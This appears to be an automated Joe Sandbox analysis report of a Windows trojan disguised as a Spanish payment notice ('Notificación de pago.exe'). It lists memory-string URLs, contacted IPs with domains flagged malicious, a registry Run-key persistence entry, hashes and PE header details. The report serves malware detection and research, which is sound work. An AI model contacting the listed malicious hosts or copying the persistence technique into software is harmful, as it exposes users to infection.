Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/n | Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comB.TTF?m | Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/Y0?m | Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/hm? | Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comcom | Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/6m | Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/Y0 | Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.come | Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com.TTF | Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                      http://www.sajatypeworks.comtNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comt-bhNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/ZmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comaNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.como)mNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.fontbureau.comdNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://en.wNotificaci#U00f3n de pago.exe, 00000000.00000003.263896171.0000000005F96000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/)mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comlNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cnNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266049177.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cnntNotificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/DmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/2Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/cm6Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/qm(Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cne-dioNotificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.commNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.jiyu-kobo.co.jp/~mQNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/MmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.comsiefNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                             IP | Domain | Country | ASN | ASN Name | Malicious
                                             192.0.78.25 | theguiriguide.com | United States | 2635 | AUTOMATTICUS | true
                                             198.54.117.212 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
                                             104.195.7.239 | www.librevillegabon.com | United States | 22552 | ESITEDUS | true
                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:626150
                                             Start date and time: 2022-05-13 16:43:47 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 11m 52s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:Notificaci#U00f3n de pago.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                             Number of new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@6/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 22.1% (good quality ratio 19.8%)
                                            • Quality average: 70.8%
                                            • Quality standard deviation: 32.4%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 40.125.122.176, 52.152.110.14, 20.223.24.244, 52.242.101.226
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                             • Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                             Time | Type | Description
                                             16:45:11 | API Interceptor | 1x Sleep call for process: Notificaci#U00f3n de pago.exe modified
                                             16:47:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run D8ILG6RHT8 C:\Program Files (x86)\Qmx6\xhl42jqfp00z.exe
                                            Process:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1308
                                            Entropy (8bit):5.345811588615766
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                            MD5:EA78C102145ED608EF0E407B978AF339
                                            SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
                                            SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                            SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.9124952245387155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Notificaci#U00f3n de pago.exe
                                            File size:535552
                                            MD5:297e8b7f26a2eb1af366cac0202eca9a
                                            SHA1:4b3e36dcd7ea9785f93e43699e1224ad30626148
                                            SHA256:441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
                                            SHA512:bd53b63f91ecdc33e6dba2929dbe1039df08bc8a84950af9fb2b34fe803c3d61fc09c40ae8843d961e4107e6970690e2ff4d7436ff1d78b7e5aa0b4c87576942
                                            SSDEEP:12288:3GuFJoO8gHHV3PnS2l3wCGeoPzaHkkzXlWaVaGNtl7:rwyHHRS2tPweEkzXRVJ
                                            TLSH:4DB41256A267A933C14A9736CCD855CC5330CF06AC23DA4768E932CC2B73BC64E91B67
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.|b..............0.."..........^A... ...`....@.. ....................................@................................
                                            Icon Hash:00828e8e8686b000
                                            Entrypoint:0x48415e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x627CAF6D [Thu May 12 06:55:41 2022 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84110 | 0x4b | .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x86000 | 0x5e0 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0xc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x840c3 | 0x1c | .text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x2000 | 0x82164 | 0x82200 | False | 0.939192333093 | data | 7.92135270708 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0x86000 | 0x5e0 | 0x600 | False | 0.429036458333 | data | 4.15748129845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x88000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country
                                            RT_VERSION | 0x860a0 | 0x354 | data | |
                                            RT_MANIFEST | 0x863f4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
                                            DLL | Import
                                            mscoree.dll | _CorExeMain
                                            Description | Data
                                            Translation | 0x0000 0x04b0
                                            LegalCopyright | Copyright 2013
                                            Assembly Version | 0.0.1.0
                                            InternalName | FormatExcept.exe
                                            FileVersion | 0.0.1.0
                                            CompanyName |
                                            LegalTrademarks |
                                            Comments |
                                            ProductName | PagedOptionsDialog
                                            ProductVersion | 0.0.1.0
                                            FileDescription | PagedOptionsDialog
                                            OriginalFilename | FormatExcept.exe
